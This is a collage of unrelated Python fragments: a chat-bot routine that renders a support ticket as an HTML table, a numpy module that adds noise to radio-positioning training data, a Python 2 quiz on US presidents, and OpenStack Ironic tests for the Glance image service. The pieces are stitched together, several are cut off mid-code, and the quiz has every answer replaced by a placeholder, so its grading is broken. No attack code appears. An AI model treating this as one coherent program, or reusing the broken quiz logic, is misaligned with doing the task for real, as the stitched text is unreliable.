"<td style='border:1px solid black;text-align:center'>" + str(requeststatus) + "</td></tr><tr>" \
"<td style='width:5%;border:1px solid blue;border-bottom: double blue;text-align:center'>PRIORITY</td>" \
"<td style='border:1px solid black;text-align:center'>" + str(request_priority) + "</td></tr><tr>" \
"<td style='width:4.5%;border:1px solid blue;border-bottom: double blue;text-align:center'>SEVERITY</td>" \
"<td style='border:1px solid black;text-align:center'>" + str(request_severity) + "</td></tr><tr>" \
"<td style='width:5%;border:1px solid blue;border-bottom: double blue;text-align:center'>COMPANY</td>" \
"<td style='border:1px solid black;text-align:center'><a href=\"" + str(OrgTicket) + "\">" + str(orgName) + "</a></td></tr><tr>" \
"<td style='width:7%;border:1px solid blue;border-bottom: double blue;text-align:center'>REQUESTER</td>" \
"<td style='border:1px solid black;text-align:center'><a href=\"" + str(requesterTicket) + "\">" + str(requesterName) + "</a></td></tr><tr>" \
"<td style='width:5%;border:1px solid blue;border-bottom: double blue;text-align:center'>CREATED</td>" \
"<td style='border:1px solid black;text-align:center'>" + str(request_created) + "</td></tr><tr>" \
"<td style='width:5%;border:1px solid blue;border-bottom: double blue;text-align:center'>UPDATED</td>" \
"<td style='border:1px solid black;text-align:center'>" + str(request_updated) + "</td></tr><tr>" \
"<td style='width:7%;border:1px solid blue;border-bottom: double blue;text-align:center'>ASSIGNEE</td>" \
"<td style='border:1px solid black;text-align:center'><a href=\"" + str(assigneeTicket) + "\">" + str(assigneeName) + "</a></td>" \
"</tr></thead><tbody></tbody></table>"
###############
reply_raw = table_header
reply = str(reply_raw).replace("\ufffd", "")
#return messageDetail.ReplyToChatV2_noBotLog(reply)
# return messageDetail.ReplyToChatV2_noBotLog(
# "<card iconSrc =\"https://thumb.ibb.co/csXBgU/Symphony2018_App_Icon_Mobile.png\" accent=\"tempo-bg-color--blue\"><header>Please find below the new Support Ticket</header><body>" + reply + "</body></card>")
return messageDetail.ReplyToChatV2_noBotLog(
"<card iconSrc =\"\" accent=\"tempo-bg-color--blue\"><header>Please find below the new Support Ticket</header><body>" + reply + "</body></card>")
############################
else:
return | |
""" Python module that contains functions to manipulate the datasets used to train the models
"""
import logging
import concurrent.futures
import numpy as np
from sklearn.preprocessing import Binarizer, Normalizer
def create_noisy_features(
features,
labels,
experiment_settings,
data_parameters,
):
"""
Creates ONE noisy sample (i.e. pair of noisy features [received power] with non-noisy labels
[position]) PER POSITION, given the target noise level. Any noisy feature instance below the
detection threshold is discarded (i.e. set to 0).
Note: the features here should be in range [0, ~1.2], according to the original experiments
:param features: numpy 2D matrix, [sample_index, feature_index]
:param labels: numpy 2D matrix, [sample_index, dimention]
:param experiment_settings: experiment-related settings
:param data_parameters: raw data-related settings
:return: one full set of noisy features, with the corresponding non-noisy labels
"""
# Computes some auxiliary variables
scaler = _get_scaler(experiment_settings["scaler_type"])
scaled_noise, scaled_cutoff = _convert_power_variables(
experiment_settings,
data_parameters
)
# Shortcut: no noise to be added? return original data
if scaled_noise == 0.0:
return features, labels
# Adds noise
noise = np.random.normal(scale=scaled_noise, size=features.shape)
noisy_features = features + noise
# Cuts features below the minimum power detection threshold
noisy_features[noisy_features < scaled_cutoff] = 0
# Removes the samples containing only 0s as features
mask = np.ones(labels.shape[0], dtype=bool)
for idx in range(labels.shape[0]):
this_samples_sum = np.sum(noisy_features[idx, :])
if this_samples_sum < 0.01:
mask[idx] = False
noisy_features = noisy_features[mask, :]
noisy_labels = labels[mask, :]
# Sanity check
assert noisy_features.shape[0] == noisy_labels.shape[0]
assert noisy_labels.shape[1] == 2
assert noisy_features.shape[1] == features.shape[1]
# Applies the scaler, if wanted
if scaler is not None:
noisy_features = scaler.fit_transform(noisy_features)
# If the model is a cnn, reshapes the input
if experiment_settings["model_type"] == "cnn":
beamformings = data_parameters["beamformings"]
time_slots = int(features.shape[1] / beamformings)
noisy_features = np.reshape(
noisy_features, (noisy_features.shape[0], beamformings, time_slots, 1)
)
return noisy_features, noisy_labels
def _convert_power_variables(experiment_settings, data_parameters):
""" `create_noisy_features` auxiliary function. Scales some power-related settings by
as much as the features were scaled.
:param experiment_settings: [description]
:param data_parameters: [description]
:return: noise and power cut off variables, as used in `create_noisy_features`
"""
# Unpacks variables
power_offset = data_parameters["power_offset"]
power_scale = data_parameters["power_scale"]
original_tx_power = data_parameters["original_tx_power"]
original_rx_gain = data_parameters["original_rx_gain"]
baseline_cut = experiment_settings["detection_threshold"]
tx_power = experiment_settings["tx_power"]
rx_gain = experiment_settings["rx_gain"]
# Computes and scales the detection theshold
adjusted_cutoff = baseline_cut - (tx_power - original_tx_power) - (rx_gain - original_rx_gain)
scaled_cutoff = (adjusted_cutoff + power_offset) * power_scale
# Scales the noise
scaled_noise = experiment_settings["noise_std"] * power_scale
return scaled_noise, scaled_cutoff
def _get_scaler(scaler_type):
"""Returns a scaler to apply to the features.
:param binary_scaler: toggle to select between Binarizer and Normalizer scaler,
defaults to True (Binarizer)
:return: the initialized scaler, and its name
"""
scaler = None
if scaler_type == "binarizer":
scaler = Binarizer(0.1, copy=False)
elif scaler_type == "normalizer":
scaler = Normalizer(copy=False)
elif scaler_type is not None:
raise ValueError("Invalid scaler type ({})! Accepted values: 'binarizer', 'normalizer'"\
.format(scaler_type))
return scaler
def undersample_bf(features, beamformings):
""" Halves the number of beamformings used in the features (expected use: 32 -> 16 BF)
:param features: numpy 2D matrix, [sample_index, feature_index]
:param beamformings: Number of beamformings used to create the BFF
:returns: Updated features
"""
time_slots = int(features.shape[1] / beamformings)
mask = np.ones(time_slots * beamformings, dtype=bool)
for idx in range(time_slots * beamformings):
#DIM 1 = BF, DIM 2 = TS
if (idx//time_slots)%2 == 0:
mask[idx] = False
features = features[:, mask]
logging.warning("Attention: features undersampled to 16 BFs. Features shape: %s",
features.shape)
return features
def undersample_space(features, labels, distance):
""" Widens the space between samples.
:param features: numpy 2D matrix, [sample_index, feature_index]
:param labels: numpy 2D matrix, [sample_index, dimention]
:param distance: minimum distance between samples (in meters, min=1m)
:returns: Updated features and labels
"""
distance = int(distance) #just in case
assert distance >= 1, "The minimum distance between samples has to be an integer "\
"equal or greater than 1"
mask = np.ones(labels.shape[0], dtype=bool)
for idx in range(labels.shape[0]):
label_x_scaled = int(labels[idx, 0] * 400)
if label_x_scaled % distance > 0:
mask[idx] = False
else:
label_y_scaled = int(labels[idx, 1] * 400)
if label_y_scaled % distance > 0:
mask[idx] = False
features = features[mask, :]
labels = labels[mask, :]
logging.warning("Attention: the minimum distance between samples is now %s meters. "
"Features shape: %s", distance, features.shape)
return features, labels
def position_to_class(labels, lateral_partition):
""" Used with hierarchical CNN experiments.
Converts a list of 2D positions into a list of classes, given a lateral partition. Of course,
this assumes the 2D area is a square, and each resulting class will be a sub-square with
side = lateral_partition. In other words, if lateral_partition = N, the original area will be
split in N^2 classes
:param labels: numpy 2D matrix, [sample_index, dimention]
:param lateral_partition: number of lateral partitions
"""
class_indexes = []
for idx in range(labels.shape[0]):
x_index = int(np.floor(labels[idx, 0] * lateral_partition))
if x_index == lateral_partition:
x_index = lateral_partition - 1
y_index = int(np.floor(labels[idx, 1] * lateral_partition))
if y_index == lateral_partition:
y_index = lateral_partition - 1
true_index = (y_index * lateral_partition) + x_index
class_indexes.append(true_index)
class_indexes = np.asarray(class_indexes)
return class_indexes
def get_95th_percentile(y_true, y_pred, rescale_factor=1.):
""" Gets the 95th percentile for the distance
:param y_true: ground truth
:param y_pred: model predictions
"""
len_pred = y_pred.shape[0]
array_of_distances = np.sqrt(np.sum(np.square(y_true[:len_pred, :] - y_pred), 1))
return np.percentile(array_of_distances, 95) * rescale_factor
# -------------------------------------------------------------------------------------------------
# Path-handling functions
def _static_paths_sampler(
mask,
paths,
features,
labels,
time_steps,
experiment_settings,
data_parameters
):
""" Helper function to `sample_paths` - samples static paths
Note - static paths format = {(x, y): index in the dataset}
"""
X, y = [], []
list_of_wanted_positions = np.asarray(list(paths.values()))[mask]
def _process_a_path(index_in_dataset):
x_sequence, label = None, None
x_sequence = [features[index_in_dataset, :]]*time_steps
x_sequence = _apply_noise_and_scaler(
np.asarray(x_sequence),
experiment_settings,
data_parameters
)
if x_sequence is not None:
label = labels[index_in_dataset, :]
return x_sequence, label
with concurrent.futures.ThreadPoolExecutor() as executor:
for x_sequence, label in executor.map(_process_a_path, list_of_wanted_positions):
if label is not None:
X.append(x_sequence)
y.append(label)
return np.asarray(X), np.asarray(y)
def _moving_paths_sampler(
mask,
paths,
features,
labels,
time_steps,
experiment_settings,
data_parameters
):
""" Helper function to `sample_paths` - samples moving paths
Note - moving paths format = [[dataset index for pos_1, dataset index for pos_2, ...], [...]]
"""
X, y = [], []
list_of_wanted_sequences = np.asarray(paths)[mask, :]
def _process_a_path(sequence_of_indexes):
x_sequence, label = [], None
for dataset_index in sequence_of_indexes:
x_sequence.append(features[dataset_index, :])
assert len(x_sequence) == time_steps, "The length of the obtained sequence ({}) does "\
"not match the expected length ({})".format(len(x_sequence), time_steps)
x_sequence = _apply_noise_and_scaler(
np.asarray(x_sequence),
experiment_settings,
data_parameters
)
if x_sequence is not None:
label = labels[sequence_of_indexes[-1], :]
return x_sequence, label
with concurrent.futures.ThreadPoolExecutor() as executor:
for x_sequence, label in executor.map(_process_a_path, list_of_wanted_sequences):
if label is not None:
X.append(x_sequence)
y.append(label)
return np.asarray(X), np.asarray(y)
def _apply_noise_and_scaler(
sequence,
experiment_settings,
data_parameters
):
""" Helper function to `sample_paths` - applies the noise and the scaler over a sequence
of features
"""
scaled_noise, scaled_cutoff = _convert_power_variables(
experiment_settings,
data_parameters
)
noise = np.random.normal(scale=scaled_noise, size=sequence.shape)
noisy_sequence = sequence + noise
noisy_sequence[noisy_sequence < scaled_cutoff] = 0
# Checks if the sequence contains any empty sample (sample containing only 0).
# If it does, discards the sequence, as it is a broken sequence.
this_sample_sums = np.sum(noisy_sequence, axis=1)
this_sample_sums[this_sample_sums > 0.001] = 1
if np.sum(this_sample_sums) < len(sequence):
return None
#Applies the scaler
scaler = _get_scaler(experiment_settings["scaler_type"])
if scaler is not None:
noisy_sequence = scaler.fit_transform(noisy_sequence)
if experiment_settings["scaler_type"] == "binarizer":
noisy_sequence = noisy_sequence.astype(bool)
return noisy_sequence
def sample_paths(
paths,
features,
labels,
experiment_settings,
data_parameters,
path_parameters,
sample_fraction=1.
):
"""
Given the input arguments (see description below), returns:
1 - X, the noisy sequence input data (sequences with the predefined length)
2 - y, the labels (one label per sequence)
3 - a dict with the ending index for that path type (used at test time)
Having RAM problems? Use the "sample_fraction" option in `path_parameters` and train for
more "epochs" (in this case, epochs is not the most adequate word :D) The function will use
~sample_fraction times the original dataset per "epoch", were 0 <= sample_fraction < 1
:param paths: paths created in the preprocessing step. The paths will be used with `features`
to create the actual dataset
:param features: numpy 2D matrix, [sample_index, feature_index]
:param labels: numpy 2D matrix, [sample_index, dimention]
:param experiment_settings: experiment-related settings
:param data_parameters: raw data-related settings
:param path_parameters: path-related settings
:param sample_fraction: floating point between 0 and 1, indicating | |
#Import
import os
#Set window size and get rid of Script Terminal Auto-Prints
os.system('clear')
raw_input("type anything to start: ")
os.system('clear')
#Setting Defaults
R_points = 18
A_points = 30
O_points = 0
J_points = 5
V_points = 14
alist = [A_points, "Alexander"]
olist = [O_points, "Olivia"]
vlist = [V_points, "Vince"]
rlist = [R_points, "Rebecca"]
jlist = [J_points, "Jonathan"]
while True:
#Special Effects
print "President Quiz 4.4.1(2017 Standard Edition)"
print "By <NAME>"
print "Sponsored by BusinessRate"
print " $$$$$$$$$"
print " $$o$o$$$$"
print " $$$L$$$$$"
print " $$___$$$$"
print " $$$$$$$$$"
print " $$ $$"
print " $$ $$"
print " $$ $$"
print " $$$$$$$$$$$$$$$$$$$$"
print " $$ $$"
print " $$ $$"
print " $$ $$"
print " $$"
print " $$$$ $$$$$"
print " $$ $$ $$"
print " $$ $$ $$"
print " $$ $$$$$$$$$$"
print " $$"
print " $$"
print " $$"
print "$$$$$"
#Lets the user read status or take the test
menu = raw_input("What do you want to do? (Take the test, Study, Repitition or Read the leaderboard)")
#If the user would like to test themself
if menu == "Take the test":
name = raw_input("Please enter your name: ")
#Tests the individuals separately so they can have there own scores
if name == "Olivia":
while True:
ifUserStart = raw_input("Are you ready? ")
if ifUserStart == "yes":
break
if ifUserStart == "Yes":
break
points = 0
QA = raw_input("Who is the 45th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 44th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 43rd President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 42nd President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 41st President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 40th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 39th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 38th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 37th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 36th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
print "<NAME>"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 35th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 34th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 33th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 32nd President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 31st President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 30th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 29th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 28th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 27th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 26th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 25th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 24th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 23th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 22nd President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 21st President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 20th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 19th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 18th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 17th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 16th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 15th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 14th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 13th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 12th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 11th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 10th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 9th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 8th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 7th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 6th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 5th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 4th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 3rd President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 2nd President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 1st President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
print str(points) + "/45"
percent1 = float(points)/45.0
percent2 = int((percent1 * 100)+0.5)
print str(percent2) + "%"
if points >= 40:
print "A+"
print "You are a Genius, or maybe just a cheater."
elif points >= 35:
print "A"
print "You are a Super Star, or did you have a peek for a few?"
elif points >= 30:
print "B+"
print "Awesome Job! You beat the Creater!"
elif points >= 25:
print "B"
print "Great Job!"
elif points >= 20:
print "C+"
print "You did pretty well!"
elif points >= 15:
print "C"
print "You are starting to get the hang of this!"
elif points >= 10:
print "D+"
print "Slightly Smarter than the average American"
elif points >= 5:
print "D"
print "You are an average American, try studying who the leaders of your own country were instead of watching TV!"
elif points >= 0:
print "F"
print "What are you, a rock?"
raw_input("Press anything to continue: ")
if O_points < points:
O_points = points
if name == "Jonathan":
while True:
ggez = raw_input("Are you ready? ")
if ggez == "yes":
break
if ggez== "Yes":
break
points = 0
QA = raw_input("Who is the 45th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 44th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 43rd President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 42nd President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 41st President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 40th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 39th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 38th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 37th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 36th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
print "<NAME>"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the 35th President? ")
if QA == "<NAME>":
points = points + 1
print "Correct!"
else:
print "WRONG!!!"
print "<NAME>"
QA = raw_input("Who is the | |
# Copyright 2013 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import time
from glanceclient import client as glance_client
from glanceclient import exc as glance_exc
import mock
from oslo_config import cfg
from oslo_utils import uuidutils
from six.moves.urllib import parse as urlparse
import testtools
from ironic.common import context
from ironic.common import exception
from ironic.common.glance_service import base_image_service
from ironic.common.glance_service import service_utils
from ironic.common.glance_service.v2 import image_service as glance_v2
from ironic.common import image_service as service
from ironic.tests import base
from ironic.tests.unit import stubs
CONF = cfg.CONF
class NullWriter(object):
"""Used to test ImageService.get which takes a writer object."""
def write(self, *arg, **kwargs):
pass
class TestGlanceSerializer(testtools.TestCase):
def test_serialize(self):
metadata = {'name': 'image1',
'is_public': True,
'foo': 'bar',
'properties': {
'prop1': 'propvalue1',
'mappings': '['
'{"virtual":"aaa","device":"bbb"},'
'{"virtual":"xxx","device":"yyy"}]',
'block_device_mapping': '['
'{"virtual_device":"fake","device_name":"/dev/fake"},'
'{"virtual_device":"ephemeral0",'
'"device_name":"/dev/fake0"}]'}}
expected = {
'name': 'image1',
'is_public': True,
'foo': 'bar',
'properties': {'prop1': 'propvalue1',
'mappings': [
{'virtual': 'aaa',
'device': 'bbb'},
{'virtual': 'xxx',
'device': 'yyy'},
],
'block_device_mapping': [
{'virtual_device': 'fake',
'device_name': '/dev/fake'},
{'virtual_device': 'ephemeral0',
'device_name': '/dev/fake0'}
]
}
}
converted = service_utils._convert(metadata)
self.assertEqual(expected, converted)
class TestGlanceImageService(base.TestCase):
NOW_GLANCE_OLD_FORMAT = "2010-10-11T10:30:22"
NOW_GLANCE_FORMAT = "2010-10-11T10:30:22.000000"
NOW_DATETIME = datetime.datetime(2010, 10, 11, 10, 30, 22)
def setUp(self):
super(TestGlanceImageService, self).setUp()
client = stubs.StubGlanceClient()
self.context = context.RequestContext(auth_token=True)
self.context.user_id = 'fake'
self.context.project_id = 'fake'
self.service = service.GlanceImageService(client, 1, self.context)
self.config(glance_host='localhost', group='glance')
try:
self.config(auth_strategy='keystone', group='glance')
except Exception:
opts = [
cfg.StrOpt('auth_strategy', default='keystone'),
]
CONF.register_opts(opts)
return
@staticmethod
def _make_fixture(**kwargs):
fixture = {'name': None,
'properties': {},
'status': None,
'is_public': None}
fixture.update(kwargs)
return stubs.FakeImage(fixture)
@property
def endpoint(self):
# For glanceclient versions >= 0.13, the endpoint is located
# under http_client (blueprint common-client-library-2)
# I5addc38eb2e2dd0be91b566fda7c0d81787ffa75
# Test both options to keep backward compatibility
if getattr(self.service.client, 'endpoint', None):
endpoint = self.service.client.endpoint
else:
endpoint = self.service.client.http_client.endpoint
return endpoint
def _make_datetime_fixture(self):
return self._make_fixture(created_at=self.NOW_GLANCE_FORMAT,
updated_at=self.NOW_GLANCE_FORMAT,
deleted_at=self.NOW_GLANCE_FORMAT)
def test_show_passes_through_to_client(self):
image_id = uuidutils.generate_uuid()
image = self._make_fixture(name='image1', is_public=True,
id=image_id)
expected = {
'id': image_id,
'name': 'image1',
'is_public': True,
'size': None,
'min_disk': None,
'min_ram': None,
'disk_format': None,
'container_format': None,
'checksum': None,
'created_at': None,
'updated_at': None,
'deleted_at': None,
'deleted': None,
'status': None,
'properties': {},
'owner': None,
}
with mock.patch.object(self.service, 'call', return_value=image):
image_meta = self.service.show(image_id)
self.service.call.assert_called_once_with('get', image_id)
self.assertEqual(expected, image_meta)
def test_show_makes_datetimes(self):
image_id = uuidutils.generate_uuid()
image = self._make_datetime_fixture()
with mock.patch.object(self.service, 'call', return_value=image):
image_meta = self.service.show(image_id)
self.service.call.assert_called_once_with('get', image_id)
self.assertEqual(self.NOW_DATETIME, image_meta['created_at'])
self.assertEqual(self.NOW_DATETIME, image_meta['updated_at'])
def test_show_raises_when_no_authtoken_in_the_context(self):
self.context.auth_token = False
self.assertRaises(exception.ImageNotFound,
self.service.show,
uuidutils.generate_uuid())
@mock.patch.object(time, 'sleep', autospec=True)
def test_download_with_retries(self, mock_sleep):
tries = [0]
class MyGlanceStubClient(stubs.StubGlanceClient):
"""A client that fails the first time, then succeeds."""
def get(self, image_id):
if tries[0] == 0:
tries[0] = 1
raise glance_exc.ServiceUnavailable('')
else:
return {}
stub_client = MyGlanceStubClient()
stub_context = context.RequestContext(auth_token=True)
stub_context.user_id = 'fake'
stub_context.project_id = 'fake'
stub_service = service.GlanceImageService(stub_client, 1, stub_context)
image_id = 1 # doesn't matter
writer = NullWriter()
# When retries are disabled, we should get an exception
self.config(glance_num_retries=0, group='glance')
self.assertRaises(exception.GlanceConnectionFailed,
stub_service.download, image_id, writer)
# Now lets enable retries. No exception should happen now.
tries = [0]
self.config(glance_num_retries=1, group='glance')
stub_service.download(image_id, writer)
self.assertTrue(mock_sleep.called)
@mock.patch('sendfile.sendfile', autospec=True)
@mock.patch('os.path.getsize', autospec=True)
@mock.patch('%s.open' % __name__, new=mock.mock_open(), create=True)
def test_download_file_url(self, mock_getsize, mock_sendfile):
# NOTE: only in v2 API
class MyGlanceStubClient(stubs.StubGlanceClient):
"""A client that returns a file url."""
s_tmpfname = '/whatever/source'
def get(self, image_id):
return type('GlanceTestDirectUrlMeta', (object,),
{'direct_url': 'file://%s' + self.s_tmpfname})
stub_context = context.RequestContext(auth_token=True)
stub_context.user_id = 'fake'
stub_context.project_id = 'fake'
stub_client = MyGlanceStubClient()
stub_service = service.GlanceImageService(stub_client,
context=stub_context,
version=2)
image_id = 1 # doesn't matter
self.config(allowed_direct_url_schemes=['file'], group='glance')
# patching open in base_image_service module namespace
# to make call-spec assertions
with mock.patch('ironic.common.glance_service.base_image_service.open',
new=mock.mock_open(), create=True) as mock_ironic_open:
with open('/whatever/target', 'w') as mock_target_fd:
stub_service.download(image_id, mock_target_fd)
# assert the image data was neither read nor written
# but rather sendfiled
mock_ironic_open.assert_called_once_with(MyGlanceStubClient.s_tmpfname,
'r')
mock_source_fd = mock_ironic_open()
self.assertFalse(mock_source_fd.read.called)
self.assertFalse(mock_target_fd.write.called)
mock_sendfile.assert_called_once_with(
mock_target_fd.fileno(),
mock_source_fd.fileno(),
0,
mock_getsize(MyGlanceStubClient.s_tmpfname))
def test_client_forbidden_converts_to_imagenotauthed(self):
class MyGlanceStubClient(stubs.StubGlanceClient):
"""A client that raises a Forbidden exception."""
def get(self, image_id):
raise glance_exc.Forbidden(image_id)
stub_client = MyGlanceStubClient()
stub_context = context.RequestContext(auth_token=True)
stub_context.user_id = 'fake'
stub_context.project_id = 'fake'
stub_service = service.GlanceImageService(stub_client, 1, stub_context)
image_id = 1 # doesn't matter
writer = NullWriter()
self.assertRaises(exception.ImageNotAuthorized, stub_service.download,
image_id, writer)
def test_client_httpforbidden_converts_to_imagenotauthed(self):
class MyGlanceStubClient(stubs.StubGlanceClient):
"""A client that raises a HTTPForbidden exception."""
def get(self, image_id):
raise glance_exc.HTTPForbidden(image_id)
stub_client = MyGlanceStubClient()
stub_context = context.RequestContext(auth_token=True)
stub_context.user_id = 'fake'
stub_context.project_id = 'fake'
stub_service = service.GlanceImageService(stub_client, 1, stub_context)
image_id = 1 # doesn't matter
writer = NullWriter()
self.assertRaises(exception.ImageNotAuthorized, stub_service.download,
image_id, writer)
def test_client_notfound_converts_to_imagenotfound(self):
class MyGlanceStubClient(stubs.StubGlanceClient):
"""A client that raises a NotFound exception."""
def get(self, image_id):
raise glance_exc.NotFound(image_id)
stub_client = MyGlanceStubClient()
stub_context = context.RequestContext(auth_token=True)
stub_context.user_id = 'fake'
stub_context.project_id = 'fake'
stub_service = service.GlanceImageService(stub_client, 1, stub_context)
image_id = 1 # doesn't matter
writer = NullWriter()
self.assertRaises(exception.ImageNotFound, stub_service.download,
image_id, writer)
def test_client_httpnotfound_converts_to_imagenotfound(self):
class MyGlanceStubClient(stubs.StubGlanceClient):
"""A client that raises a HTTPNotFound exception."""
def get(self, image_id):
raise glance_exc.HTTPNotFound(image_id)
stub_client = MyGlanceStubClient()
stub_context = context.RequestContext(auth_token=True)
stub_context.user_id = 'fake'
stub_context.project_id = 'fake'
stub_service = service.GlanceImageService(stub_client, 1, stub_context)
image_id = 1 # doesn't matter
writer = NullWriter()
self.assertRaises(exception.ImageNotFound, stub_service.download,
image_id, writer)
def test_check_image_service_client_set(self):
def func(self):
return True
self.service.client = True
wrapped_func = base_image_service.check_image_service(func)
